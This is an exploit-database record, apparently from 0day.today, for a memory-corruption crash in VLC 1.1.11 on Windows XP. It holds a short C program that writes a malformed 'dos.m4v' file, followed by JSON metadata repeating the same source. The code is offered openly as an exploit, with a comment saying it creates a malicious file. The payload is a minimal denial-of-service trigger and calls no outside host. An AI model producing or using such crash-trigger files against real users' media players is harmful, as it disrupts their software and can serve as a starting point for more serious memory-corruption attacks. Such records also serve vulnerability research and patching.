ID 1337DAY-ID-17720
Type zdt
Reporter Dan Fosco
Modified 2012-03-14T00:00:00
Description
Exploit for windows platform in category local exploits
# Exploit Title: VLC v. 1.1.11 .m4v Memory Corruption
# Date: 3/14/2012
# Author: Dan Fosco
# Vendor or Software Link: www.videolan.org
# Version: 1.1.11
# Category:: local
# Google dork: n/a
# Tested on: Windows XP SP3 (64-bit)
# Demo site: n/a
#include <stdio.h>
int main()
{
FILE *f;
f = fopen("dos.m4v", "w");
fputc('\x00', f);
fputc('\x00', f);
fputc('\x00', f);
fputc('\x00', f);
fputs("\x66\x74\x79\x70", f);
fclose(f);
return 0;
}
//use code for creating malicious file
# 0day.today [2018-01-05] #
{"id": "1337DAY-ID-17720", "lastseen": "2018-01-05T07:13:24", "viewCount": 3, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2018-01-05T07:13:24", "rev": 2}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-17781"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8019", "SECURITYVULNS:DOC:17720"]}], "modified": "2018-01-05T07:13:24", "rev": 2}, "vulnersScore": 0.5}, "type": "zdt", "sourceHref": "https://0day.today/exploit/17720", "description": "Exploit for windows platform in category local exploits", "title": "VLC v. 1.1.11 .m4v Memory Corruption", "cvelist": [], "sourceData": "# Exploit Title: VLC v. 1.1.11 .m4v Memory Corruption\r\n# Date: 3/14/2012\r\n# Author: Dan Fosco\r\n# Vendor or Software Link: www.videolan.org\r\n# Version: 1.1.11\r\n# Category:: local\r\n# Google dork: n/a\r\n# Tested on: Windows XP SP3 (64-bit)\r\n# Demo site: n/a\r\n\r\n#include <stdio.h>\r\n\r\nint main()\r\n{\r\n\tFILE *f;\r\n\tf = fopen(\"dos.m4v\", \"w\");\r\n\tfputc('\\x00', f);\r\n\tfputc('\\x00', f);\r\n\tfputc('\\x00', f);\r\n\tfputc('\\x00', f);\r\n\tfputs(\"\\x66\\x74\\x79\\x70\", f);\r\n\tfclose(f);\r\n\treturn 0;\r\n}\r\n\r\n//use code for creating malicious file\r\n\r\n\n\n# 0day.today [2018-01-05] #", "published": "2012-03-14T00:00:00", "references": [], "reporter": "Dan Fosco", "modified": "2012-03-14T00:00:00", "href": "https://0day.today/exploit/description/17720"}
{}